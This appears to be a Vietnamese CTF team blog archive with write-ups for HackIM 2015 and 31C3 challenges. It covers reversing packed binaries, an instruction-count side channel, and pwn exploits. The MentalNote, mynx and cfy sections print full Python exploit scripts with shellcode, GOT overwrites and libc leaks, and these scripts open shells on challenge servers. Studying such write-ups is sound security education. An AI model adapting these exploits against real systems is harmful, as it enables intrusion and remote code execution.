Monthly Archives: January 2015

[HackIM 2014] RE + Pwn MentalNote

RE 100 - boo

binary khá nặng

C:\Users\chim\Desktop\nullcon\re\boo>trid boo

TrID/32 - File Identifier v2.10 - (C) 2003-11 By M.Pontello

Collecting data from file: boo
100.0% (.) Mac OS X Mach-O 64bit Intel executable (4000/1)

=> Mac OS Binary kernel Mach 64 bit

Check string 1 tí thì thấy UPX 3.91!. Ok thử decompress nào

C:\Users\chim\Desktop\nullcon\re\boo>upx -d boo
            Ultimate Packer for eXecutables
             Copyright (C) 1996 - 2013
UPX 3.91w    Markus Oberhumer, Laszlo Molnar & John Reiser  Sep 30th 2013

    File size     Ratio   Format   Name
  --------------------  ------  -----------  -----------
upx: boo: NotPackedException: not packed by UPX

Unpacked 0 files.

Failed!

Check lại string lần nữa để ý thấy cái zlib.so, struct.so, python ME... nghi ngờ thể loại python->bin quá.

Find header PYZ => founded :yolo:

boo_3

Ok easy roài, extract data python ra thôi - Link

import sys

if len(sys.argv) == 13:
	print "Great: flag{g3771ng_st4rt3d_2015}"
else:
	print "."

-------------------------------------------------------------------------------------------------------

RE 200 - upx.exe

string thử chả thấy cái UPX! signature nào @@. decompress lại cho chắc failed nốt.

upx_1

Run

upx_2

OK boy let's make it nicely!

Bật IDA Disass thấy đây là 1 binary MS C++ bình thường.

main là winMain -> sau đó call hàm sub_4001000

int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
  sub_401000();
  return 0;
}

void *__cdecl sub_401000()
{
  void *result; // eax@1
  void *MZ_header; // ecx@1
  int v2; // ecx@4
  int v3; // ebp@4
  int v4; // esi@4
  int v5; // ebx@4
  const char *v6; // edi@5
  unsigned int v7; // edi@9
  int v8; // ebx@9
  HANDLE v9; // eax@9
  void *v10; // esi@9
  unsigned int v11; // eax@10
  HANDLE v12; // eax@12
  int v13; // ebx@12
  SIZE_T v14; // [sp+0h] [bp-28h]@1
  int v15; // [sp+4h] [bp-24h]@14
  int v16; // [sp+8h] [bp-20h]@14
  int v17; // [sp+Ch] [bp-1Ch]@14
  int v18; // [sp+10h] [bp-18h]@14
  int v19; // [sp+14h] [bp-14h]@14
  SIZE_T v20; // [sp+18h] [bp-10h]@14
  int v21; // [sp+1Ch] [bp-Ch]@14
  int v22; // [sp+20h] [bp-8h]@14
  int v23; // [sp+24h] [bp-4h]@14

  result = GetModuleHandleW(0);
  MZ_header = result;
  v14 = (SIZE_T)result;
  if ( result )
  {
    result = (void *)'ZM';
    if ( *(_WORD *)MZ_header == 'ZM' )
    {
      result = (char *)MZ_header + *((_DWORD *)MZ_header + 15);
      if ( *(_DWORD *)result == 'EP' )
      {
        v2 = *((_WORD *)result + 10);
        v3 = *((_WORD *)result + 3);
        v4 = 0;
        v5 = (int)((char *)result + v2 + 24);
        if ( v3 > 0 )
        {
          v6 = (char *)result + v2 + 24;
          while ( 1 )
          {
            result = (void *)strcmp(v6, ".reloc");
            if ( !result )
              break;
            ++v4;
            v6 += 40;
            if ( v4 >= v3 )
              return result;
          }
          v7 = *(_DWORD *)(v5 + 40 * v4 + 16);
          v8 = v5 + 40 * v4;
          v9 = GetProcessHeap();
          result = HeapAlloc(v9, 8u, v7 + 1);
          v10 = result;
          if ( result )
          {                      // malloc, copy hex sang cho malloc 6600
            unknown_libname_41(result, v14 + *(_DWORD *)(v8 + 12), *(_DWORD *)(v8 + 16));
            v11 = 0;
            if ( v7 )
            {
              do
                *((_BYTE *)v10 + v11++) ^= 0x11u;
              while ( v11 < v7 );
            }
            v14 = *(_DWORD *)v10;
            v12 = GetProcessHeap();
            result = HeapAlloc(v12, 8u, v14);
            v13 = (int)result;
            if ( result )
            {
              result = (void *)sub_406660((int)((char *)v10 + 4), (int)result, v7 - 4, (int)&v14);
              if ( !result )
              {
                v18 = 0;
                v15 = 0;
                v16 = 0;
                v17 = 0;
                v21 = 0;
                v22 = 0;
                v23 = 0;
                v20 = v14;
                v19 = v13;
                LOBYTE(v18) = 1;
                sub_401B60((int)&v15);
                ExitProcess(1u);
              }
            }
          }
        }
      }
    }
  }
  return result;
}

đầu tiên nó gọi hàm getModuleHandle để tìm base address của MZ Header
sau đó check MZ signature và PE signature ::for sure::

upx_3

find session .alloc

upx_4upx_6

var A = heapalloc(0x6600)

đến đoạn unknown_libname_41 này vì mình rất ghét cái gì cứ dấu giếm, và 1 phần nhác trỗi dậy. function thông thường của mscrt thôi nên xem các tham số truyền vô và kết quả trả về để đoán vậy (memcpy)

memcpy(0x41b00, A, 0x6600)
for i in range(0x6600):
	A[i] ^= 0x11

*một đoạn memory khá dài, lại còn bị mã hóa nữa. không thể nào là flag cipher được? Có lẽ nào là shellcode?

new_size = *(dword*)A = 0xbe00
var B = heapalloc(new_size)
sub_406660( &new_size ) => copy MZ_Header -> đến B, size = 0xbe00

upx_5

Từ đây ta nhảy vào sub func cuối là sub_401b60

Check các sub phụ, để ý các string mình thấy rất là liên quan

[+] Mapping PE file
[+] Creating Map View of File
[+] Map View of File created
[+] Checking for self relocation
[+] MyBase, MySize ?!?
[+] Jumping to relocated image
[+] Processing IAT
[+] Loading Library and processing
[+] Fixing Image Base address in PEB
[+] Executing Entry Point !!!

và 1 số function khá vãi

- CreateFileMappingW
- MapViewOfFile
- VirtualAlloc
- GetProcAddress
- VirtualQuery
- LoadLibraryA
- VirtualProtect

oke, tít đi ít! run shellcode chắc roài ::bem::

ta đặt breakpoint ở ngay các sub con và run lần lượt đến khi nào shell được chạy thì phát hiện điểm G

upx_7

sub_401b60 -> sub_401600 -> call eax
new entry point = 08001563

sài HxD (hex editor) view ram process upx.exe tại địa chỉ đó thì thấy nguyên session từ 0x08000000 -> 0x0800FFFF là 1 file PE mới,

search string thì thấy có dòng "You didn't ask nicely" và đặc biệt là "-pl34se-give-me-th3-k3y" :-ss

tới đây các bạn có thể extract ra 1 file exe mới và disass nghiên cứu (ko chắc là sẽ chạy đc ok), còn mình thì thấy nó có dạng 1 file ms c++ nữa nên so sánh structure với cái PE gốc để tìm addr winMain

địa chỉ 0x08001100

quá trình dịch cũng tương tự, bài mới này cũng không quá khó.

st = command_line_string
st[len(st)-1] = \x00

if st[len(st)]==\x20:
	if !strcmp(st, "-pl34se-give-me-th3-k3y"):
		func_flag()
		exit()
msgbox("You not nicely");

patch luôn cho lẹ, patch luôn chỗ strcmp và trong func_flag (0x08001000) có 1 chỗ gọi isDebuggerPresent (0x08001024)

upx_8

upx_9

Done.

----------------------------------------------------------------------------------

RE 400 - fin64

ubt64@ubt64-vb:/media/sf_Desktop/nullcon/re/fin64$ file fin64
fin64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x9b62a9678a30ce6c576131024148154a0bc5575d, stripped

khi chạy và thử nhiều cách input, đều có kết quả "Not yet.."

ubt64@ubt64-vb:/media/sf_Desktop/nullcon/re/fin64$ ./fin64
Not yet..

main khá ngắn, ta dịch lần lượt
để ý, có 2 cái good_boy và bad_boy trong hình

fin64_1

đầu tiên là func_systime
gọi syscall 0xc9 để lấy timestamp sao đó lưu giá trị vào [rbp-18h]

fin64_2

func_ctime - convert timestamp thành giá trị giây:phút:giờ:ngày:tháng:năm => lưu vào [rbp-10h]

fin64_3

dừng ở đây, jump ngược từ good_boy và bad_boy ta thấy có đoạn sử dụng [rbp-10h]

fin64_4

nếu [rbp-10h] ở không bị thay đổi thì đoạn code pseudo ntn:

[rbp-24h] = [dw_time+16]+1 = tháng
[rbp-20h] = [dw_time+12] = ngày
[rbp-1ch] = [dw_time+20] + 1900 = năm
if ( [rbp-24h] == 9 && [rbp-20h] == 10 && [rbp-1ch] == 2011 )
	good_boy
else
	bad_boy

thử đặt lại time là 10/9/2011 và run => still failed :wth:

giờ ta jump back từ đoạn compare trên đến ngay sau chỗ convert, patch những đoạn jump để bypass khoảng ở giữa và chạy lại 1 lần nữa

$ ./fin64
Oops..

Good bj, mình đoán flag nằm trong memory, thử trace dần vào good_boy

thì phát hiện ra cái này *byte_6c2070

fin64_5

next-challenge

--------------------------------------------------------------------------------------

RE 500 - cso

bài này thực sự không biết nên viết writeup như thế nào vì công nhận là nó khá bựa và cách làm cũng ngẫu hứng vãi nhái :3

sau hồi dịch mình chả biết nó là cái giống gì, có vẻ giống virtual machine nhưng cũng ko giống lắm =)), đại khái nó như này:

main:
	print(Bla bla bla)
	gets(st) #main input
	len_st = strlen(st)
	super = 0x24ae5af1 #first magic hex
	while True:
		A: 
			if super-a1>0: jump b1
		B: 
			if super-a2>0: jump b2
		C: 
			if super-a3>0: jump b3
		...
		V: 
			if super-an>0: jump bn
		X:
			super = a(n+1)
		Y:
			super = a(n+2)
		...
		Z:
			super = am
		quit:
			break
		dead: 
			puts("You are dead man")
			super = super_to_quit
			continue
		win: 
			puts("You are safe and live forever")
			super = super_to_quit
			continue
		check_len: 
			if len_st==0x1A: 
				super = super_to_stage2
			else:
				super = super_to_dead
			continue
		stage_2:
			#func_stage2 ở địa chỉ 0x00400ec0
			if func_stage2(st)==1: 
				super = super_to_win
			else:
				super=super_to_dead
			continue

#mấy số a1, a2, ...an, a(n+1), ... , am là magic const, ko biết có quy luật gì những mà nó đc build để tính toán hợp lí
#các jump b1, b2, b3, ... bn là nhãn của một trong mấy thằng A,B,C,...V, quit, dead, win, check_len, stage_2

			
def stage2(st):
	#cấu trúc đệ quy
	#vòng lặp tương tự main
	#có thêm 1 số sub function phụ

Không biết flag ở chỗ nào luôn, code follow control dựa vào mấy phép cộng của a(i), giờ tìm quy luật cho nó cũng đuối đơ. Có duy nhất 1 cái chắc chắn là len_st = 0x1A = 26 (!!!)

Sau nửa tiếng suy nghĩ, mình thấy khi input với len = 26 và len < 26 thì cảm giác debug lâu hơn. Suy nghĩ: Side channel dựa vào instruction count được không?

$ python -c "print 'a'*26" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123368

$ python -c "print 'a'*25" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

$ python -c "print 'a'*24" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

Bingo, chuẩn girl mất rồi, side channel bem lần lượt các char

import subprocess
import time

sam = "abcdefghijklmnopqrstuvwxyz"
sam += sam.upper()
sam += "0123456789_!,.{}"

#217826 SRRDRSSRSRRDDSSSRSSDSDDDSS

def insco(fl):
	fl += 'a'*(26-len(fl))
	open('hellyeah','wt').write(fl)
	subprocess.call("./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ../cso < hellyeah", shell=True)
	time.sleep(0.2)
	k = open("inscount.out").read().strip().split(' ')[1]
	print "-----", fl, k
	return int(k)

def dequy(fl):
	if len(fl)==26:
		print fl
		raw_input("<< Another result, enter for the next...")
	else:
		a = insco(fl + 'a')
		#Cho nay sample chi co 1 ki tu trong string "SRD" thoi (manual check), co the set sam = "SRD" side channel nhanh hon
		for c in sam:
			cou = insco(fl + c)
			if cou-a>400: dequy(fl + c)


dequy('')

=> Final SRRDRSSRSRRDDSSSRSSDSDDDSS. Không giống flag cho lắm :-ss

Input test lại vẫn "You are dead man". Wut dafuq, đúng quá rồi còn gì.
Check lại cái inscount thì thấy có sự chênh lệch rất lớn ins.
Có thể là những mini-sub trong stage2 (0x00400ec0)
Kiểm tra lần lượt từng mini-sub đó ta thấy có sub_400BD0 sử dụng biến global(s) chính là string input ban đầu?!?

cso_1

Đặt breakpoint ngay tại đó và input đúng như trên, sau 1 số lần trace thì ...

cso_2
Âu Mai Gót, call cái địa chỉ vừa trả về, không phải run shell thì là run cái gì nữa =))

Chuyển hướng sang disass con shell, tương tự 3 bài rồi

cso_3

move rất nhiều ASCII Char vào memory, ghép lại thì thấy đó là 1 chuỗi base32 😛

Hard time gone 😛

s = "MZWGCZ33NV4V6YZQNVYDINJVL4YTKX3VNYYXC5JTPU"
sam = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

def tobin(t):
  st = bin(t).replace('0b','')
  st = '0'*(5-len(st)) + st
  return st

k = ''
for i in s:
  t = sam.find(i)
  print i, sam.find(i), tobin(t)
  k += tobin(t)

k = k[0:208]
print hex(int(k,2))[2:].replace('L','').decode('hex')

flag{my_c0mp455_15_un1qu3}

--------------------------------------------------------------------------------------

PWN 400 - Mental Note

bài này về cơ bản khá giống mixme

cấu trúc dữ liệu:

struct note{
	int size;
	note* next_note;
	note* prev_note;
	content[linh động]
}

và array_note[999] lưu địa chỉ con trỏ của mỗi note được thêm

có 3 loại note:

loại 0 : content 100 bytes
loại 1 : content 200 bytes
loại 2 : content 400 bytes

* add-note, người dùng nhập 1 loại note sau đó chương trình malloc 1 lượng bộ nhớ vừa đủ phần header+content size => new_note

new_note được insert vào array_note sau khi đã check-note (dựa vào note header) để tìm id phù hợp.

* edit-note, người dùng nhập id, loại note và read(note-id-content, size=note-type) mà ko check xem note ở id ấy có đúng loại không.
=> nếu note add vào là loại 0 mà khi edit với loại 1/2 thì sẽ overwrite được sang header note khác.

bằng cách này ta sẽ chỉnh phần header của note kế tiếp để khai thác lỗi check-note của add-note function.

Payload:

import socket, time

def send(s, m):
  print "[SEND]", m
  s.send(m)

def recv(s):
  t = s.recv(4096)
  print "[RECV]", t
  return t

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (( "54.163.248.69",9004 ))

recv(s)
recv(s)

#Add 3 notes, Type 0
for i in range(3):
	send(s, "1\n")
	recv(s)
	send(s, "0\n")
	recv(s)

#Edit note id=2, Type=0, shellcode
send(s, "3\n")
recv(s)
send(s, "2\n")
recv(s)
send(s, "0\n")
recv(s)
#shell
shell = "\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
send(s, "\x90"*20 + shell)
recv(s)

#Edit note id=0, Type=1, overwrite header and change g0t.plt
send(s, "3\n")
recv(s)
send(s, "0\n")
recv(s)
send(s, "1\n")
recv(s)
#magic bytes
send(s, (0x80-12)*'a' + "\x04\xc1\xeb\x0f\x1c\xb0\x04\x08")
recv(s)

#jump to shellcode by function was changed in g0t.plt
send(s, "1\n")
recv(s)
send(s, "0\n")
recv(s)

send(s,"cat flag.txt\n")
recv(s)

#flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3}

s.close()

flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3} !!!

So long and deep, go get some sleep :'( . Chim!

[Write Up] Hackim CTF - mixme - PWN5

Đánh giá sơ lược về binary:

~/Sources/CTFs/hackim » file mixme                peternguyen@peternguyen
mixme: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=b93d20dd523097dd7d53a7fda265a2d977d29c30, stripped

Checksec:

Chương trình có 3 lệnh chính: (store/edit/get)

Phân tích hàm edit

Đựa trên hàm store, mình có thể reverse lại được cấu trúc lưu trữ của chương trình như sau:

struct node{
 char name[16];
 int size;
 char *data;
 struct node *next;
 struct node *prev;
}

size là khích cỡ vùng nhớ được malloc cho data.

Các node được lưu trữ bằng một danh sách double linked list circular

Vùng nhớ tổ chức trong mem như sau (tạo 2 block với data size = 16:

Gồm 3 block: block head được khởi tạo mặc định khi chạy chương trình.

Để ý phần data của block được cấp phát là 1 đoạn đằng sau block, tôi sẽ đề cập sau ở phần khai thác lỗi.

Phân tích hàm edit

Nhập name,và size, hàm sẽ duyệt qua linked list để tìm ra block có tên tương ứng, và cập nhật lại phần data.

Để ý phần sau:

Chương trình đọc từ stdin vào data nbytes, mà nbytes không check length.

Nếu tạo 2 block liền nihau thì, phần tiếp theo phần data của block 1 là block2 nên ta có thể overwrite được cái block 2.

Phân tích hàm get:

Nhập vào tên block và size, tìm ra block tương ứng, in phần data ra màn hình, free vùng data và block, cập nhật lại linked list. Để ý write(1,node->data,n); mình sẽ dùng nó để leak addr

Khai thác lỗi.

Ở đây mình sẽ overwrite địa chỉ data bằng địa chỉ của một hàm trong bảng got bằng cách lợi dụng phần read(0,node->data,node->size)

Để ý hàm free(node->data) nhận input là phần data nhập vào, ý tưởng là overwrite free trong bảng got là system và ta có, system(node->data).

Payload của mình làm theo các bước như sau:

 1. Tạo ra 2 block peter123,lol123 với data size của mỗi block là 16 bytes
 2. edit block peter123: với size 56, 'D'*28 + '\x00' * 16 + 'CCCC', với CCCC => địa chỉ hàm free, sở dĩ mình padd '\x00'*16 byte để làm name của block2 = 'DDDD'.
 3. edit block 2 ('DDDD') với size 4 bytes để ghi đè free trong bảng got ở đây mình ghi đè got bằng địa chỉ của lệnh ret, mục đích là để bypass qua hàm free, vì mình lợi dụng lệnh ret để leak 1 địa chỉ trong bảng GOT.
 4. get block 2('DDDD') minh sẽ leak được 1 địa chỉ trong bảng GOT, từ đó tính được địa chỉ hàm system.
 5. Tạo tiếp 2 block bất kì (b1,b2) với data size của mỗi block là 16 bytes
 6. edit block1('b1') ghi đè địa chỉ data của block 2 bằng địa chỉ free một lần nữa
 7. edit block2() để ghi đè free bằng system.
 8. Tạo ra block 'shell' với phần data='/bin/sh'
 9. get block('shell') và boom đã có được shell

Payload: http://pastebin.com/n2G30Fk4

[Write up] 31C3 mynx

Đây là một bài khá hay, mình phải mấy mấy tiếng đồng hồ để phân tích code.

Đầu tiên chương trình tổ chức bộ nhớ, cấp phát như sau:

Cấp phát 1 vùng nhớ 0x1000 bytes đầu tiên, và set 4 byte kế tiếp là length <địa chỉ vùng nhớ><độ dài phần tử>(1)

Vùng nhớ 0x1000 bytes này được chia nhỏ ra 16 phần, 1 phần là 256 bytes.

Nếu vùng nhớ 0x1000 bytes này hết , chương trình sẽ tạo 1 vùng nhớ khác tiếp theo như (1)

Cấu trúc của một ascii art được phân bố như sau:

struct ascii_art{
   char tag; // tag của ascii_art có giá trị bằng 'I'
   int id;
   void (*filter)(char* content);
   char content[247];
};

Cấu trúc của một comment được phân bố như sau:

struct comment{
  char tag; // tag có giá trị bằng '7'
  int id;
  char content[251];
}

Xem xét đoạn mã sau:

Sau khi tạo 1 block comment, chương trình đọc vào vùng content với giá trị là 252 bytes (lố 1 byte) dựa vào đây mình sẽ khai thác được lỗi, ghi đè giá trị tag của block kế, biến block comment -> block ascii art, từ đó fake được filterfunc.

đoạn mã trên dùng để trigger bug khi biến block comment -> block ascii art

Các khai thác lỗi:

Tạo 1 block ascii art, tạo 2 block comment cho block ascii 1 , tạo block ascii art 2
+----------------------+
| Ascii Block 1    |
+----------------------+
| comment 1(1)    |
+----------------------+
| comment 2(1)    |
+----------------------+
| Ascii Block 2    |
+----------------------+

Xóa hết comment block 1, tạo lại comment cho block 1 và block 2, dùng comment block 2, overwrite giá trị tag của Ascii Block 2 thành comment, dùng comment block 1 để overwrite comment block 2 thì Ascii Block 2

+----------------------+
| Ascii Block 1    |
+----------------------+
| comment 1(1)    |
+----------------------+
| comment 1(2)    |
+----------------------+
| Ascii Block 2    |
+----------------------+

Trạng thái cần đạt được

+--------------------------------+
| Ascii Block 1         |
+--------------------------------+
| comment 1(1)         |
+--------------------------------+
| comment 2(1),block 2 fake   |
+--------------------------------+
| Ascii Block 2, comment 2 fake |
+--------------------------------+

Trigger bug và ta có

Do mình có thể control được filter_func và content, cho nên mình sẽ dùng printf và fmt để leak được địa chỉ __libc_main_start ở trên stack, từ đó tính được địa chỉ của hàm system

Payload:

import socket
from struct import *
import telnetlib

#+------------------+
#|	Ascii Block 1 	|
#+------------------+
#|	comment 1 		|
#+------------------+
#|	comment 2 		|
#+------------------+
#|	Ascii Block 2 	|
#+------------------+

def connect(host,port):
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,port))
	return s

def add_ascii_block(s,block):
	s.send('1\n')
	s.recv(1024)
	s.recv(1024)
	s.send('1\n')
	s.recv(1024)
	s.send(block)

def add_comment_block(s,block):
	s.send('1\n')
	s.recv(1024)
	s.send(block)

def select_block_id(s,block_id):
	s.send('3\n') # select
	s.recv(1024)
	s.recv(1024)
	s.send(str(block_id) + '\n')
	s.recv(1024)
	s.recv(1024) # comment menu

def back_to_main_menu(s):
	s.recv(1024)
	s.recv(1024) # comment menu
	s.send('0\n') # back
	s.recv(1024) # main menu
	s.recv(1024)

def leak_mem(s):
	__libc_main = 0
	fmt = '%p'*22 + '%s'
	payload = pack('<I',0x8048420) # printf
	payload+= fmt + 'A'*(0xfb - 4 - len(fmt)) + '7'

	s.recv(1024) # banner
	s.recv(1024) # main menu
	add_ascii_block(s,'A'*0xf6 + '\n') # add ascii block
	s.recv(1024)
	s.recv(1024) # main menu
	select_block_id(s,1)
	add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
	back_to_main_menu(s)
	add_ascii_block(s,'B'*0xf6 + '\n')
	s.recv(1024)
	s.recv(1024) # main menu
	select_block_id(s,1)
	s.send('2\n') # remove all comments of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'D'*0xfb + '\n') # add comment of block 1
	back_to_main_menu(s)
	# add comment to block 2, change ascii block 2 into comment block 2
	select_block_id(s,2)
	add_comment_block(s,payload)
	back_to_main_menu(s)
	select_block_id(s,1)
	# change 1st comment of block 2 into block 2
	s.send('2\n') # remove all comments of block 1
	s.recv(1024)
	s.recv(1024) # comment menu
	add_comment_block(s,'A'*0xfb + 'I') # mark that comment 1 of block 2 is block 2
	back_to_main_menu(s)
	select_block_id(s,2)
	s.send('3\n') # trigger bug
	d = s.recv(1024)
	if '\xf7' in d:
		index = d.index('\xf7')
		__libc_main = d[index - 3:index + 1]
		__libc_main = unpack('<I',__libc_main)[0]
	s.send('0\n') # back
	s.recv(1024) 
	s.recv(1024) # main menu
	return __libc_main

def exploit():
	s = connect('188.40.18.80',1234)
	__libc_main = leak_mem(s)
	offset = 149824 # Ubuntu 14.10

	if (__libc_main & 0xf7000000) == 0xf7000000:
		system_addr = __libc_main + offset

		cmd = '/bin/sh\x00'

		payload = pack('<I',system_addr)
		payload+= cmd + 'A'*(0xfb - 4 - len(cmd)) + '7'
		print '[!!!] System(): ',hex(system_addr)

		add_ascii_block(s,'A'*0xf6 + '\n') # add ascii block
		s.recv(1024)
		s.recv(1024) # main menu
		select_block_id(s,3)
		add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'C'*0xfb + '\n') # add comment of block 1
		back_to_main_menu(s)
		add_ascii_block(s,'B'*0xf6 + '\n')
		s.recv(1024)
		s.recv(1024) # main menu
		select_block_id(s,3)
		s.send('2\n') # remove all comments of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'D'*0xfb + '\n') # add comment of block 1
		back_to_main_menu(s)
		# add comment to block 2, change ascii block 2 into comment block 2
		select_block_id(s,4)
		add_comment_block(s,payload) # real payload
		back_to_main_menu(s)
		select_block_id(s,3)
		# change 1st comment of block 2 into block 2
		s.send('2\n') # remove all comments of block 1
		s.recv(1024)
		s.recv(1024) # comment menu
		add_comment_block(s,'A'*0xfb + 'I') # mark that comment 1 of block 2 is block 2
		back_to_main_menu(s)
		select_block_id(s,4)
		s.send('3\n') # trigger bug
		print '[!!!] Shell is comming'
		# interact socket with stdin,stdout
		t = telnetlib.Telnet()
		t.sock = s
		t.interact()

exploit()

[Write Up] 31C3 cfy

Chạy chương trình, hiện ra 1 menu:

What do you want to do?
0) parse from hex
1) parse from dec
2) parse from pointer
3) quit

Chương trình parse input option vào như sau :

option người dùng nhận vào ở rbp-0xc

 

Kiểm tra giá trị rbp-0xc nếu bằng 3 thì thoát.

Nhận input người dung vào địa chỉ 0x6010e0 dùng option mà người dụng chọn tính ra hàm tương ứng cần gọi (0x601080 lưu địa chỉ các hàm : fromhex,fromdec,fromptr)

rax = (long *)0x601080[$(rbp-c)]; mov rdi,0x6010e0; call eax;

để ý lúc kiểm tra option nhập vào trương trình chỉ kiểm tra đk $(rbp-0xc) != 3 thì sẽ execute đoạn trên. Để ý địa chỉ input lớn hơn địa chỉ lưu trữ các hàm, nếu nhập input > 3 thì ta sẽ có : 0x601080 + $(rbp-0xc)*8 với 1 giá trị x của $(rbp-0xc) thì eax sẽ trỏ tới input của mình và mình có thể kiếm soát đc call eax.

Ngoài ra, hàm fromptr có thể cho phép mình đọc bất kỳ vùng nhớ nào.

Payload sẽ là:

- dùng hàm fromptr để leak địa chỉ 1 hàm trong libc, dự đoán phiên bản libc đang chạy trên server (ở đây là ubuntu 14.10) , có offset từ hàm đó đến system

- sử dụng bug trên để eax=system, và argv = /bin/sh

import socket
from struct import *
import telnetlib
# 116064
# Login: cfy_pwn // 31C3_G0nna_keep<on>grynding
def connect(host,port):
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,port))
	return s

def build_payload(system_addr):
	shell = '/bin/sh\x00'
	buff_addr = 0x6010e0
	func_addr = 0x601080

	payload = shell + '\x00'*8
	jmp_offset = 6 + (len(payload) >> 4)
	payload += pack('<Q',system_addr) + '\n'

	return (jmp_offset,payload)

def exploit():
	offset = 179728

	s = connect('188.40.18.73',3313)
	s.recv(1024) # banner
	# leak libc addr
	s.send('2\n')
	s.recv(1024)
	s.send(pack('<Q',0x601018) + '\n') # puts@got
	leak_addr_str = s.recv(1024).split('\n')
	leak_addr = int(leak_addr_str[1].replace('hex: ',''),16)

	system_addr = leak_addr - offset
	print '[+] system():',hex(system_addr)
	jmp_offset,payload = build_payload(system_addr)
	# send payload
	s.recv(1024)
	s.send(str(jmp_offset) + '\n')
	s.recv(1024)
	s.send(payload)

	# interact socket with stdin,stdout
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

exploit()

Welcome to BabyPhD!

Đôi lúc tôi hay một mình

Tự hỏi rằng đời này có bao nhiêu ngày vui*

 

Các trang blog CTF nói chung thường có hiện tượng bong bóng như kiểu nhà đất Việt Nam thập niên hai ngàn. Ất min ban đầu mới lập cũng chịu khó đầu tư. Dần dần cơm áo gạo tiền và đủ thứ vớ vẩn sinh chán. Thêm nữa hậu duệ kém không kế tục được sự nghiệp nên hỏng cả. Thời còn mông muội, dân tình vào chơi ngõ hầu muốn được cái gì đó nhưng dần dà blog CTF đã không đáp ứng được với thời cuộc. Ngay đến cả thằng đầu xỏ ất min cũng bỏ mẹ qua facebook cầm kiếm nhựa chém nhau. Ấy vậy mà BabyPhD chúng tôi vẫn mạnh dạn mở blog CTF writeup. Ở xã hội thấy thịnh thì phù mà thấy suy thì nhổ có được những thánh thần rơi rớt lại những tính túy cuối cùng của các tay hacker mũ trắng thật là tự thấy mừng cho cộng đồng IT Việt vậy.

Để mở đầu cho chương trình nghệ thuật tấn công đến đâu viết lại tới đấy, chia sẻ chút kiến thức còm cõi cho đồng đạo security, chúng tôi xin hân hạnh khai trương blog BabyPhD với các thành viên trụ cột sau:

 • chuymichxinhdep: đã xinh đẹp lại còn học thức <3
 • yeuchimse: lời ít tình chi thít
 • peternguyen: anh hùng thời loạn
 • justcallmedude: gay kín không tên
 • antibkav: loại già có vợ nên luôn là thành viên bỏ đi của team, vớt vát cho nó phong phú
 • huyna: hiệp sĩ thoắt ẩn thoắt hiện, chỉ thấy xi nhan khi có bài pwn
 • chim: geohot của nhóm

(Một vài thành viên khác xin giấu tên, số thành viên liên tục cập nhật nếu các bạn apply tại  đây)

 

Xin chào thân ái và quyết thắng

- Chụy Mích

*Đời có bao nhiêu ngày vui - st:Châu Đăng Khoa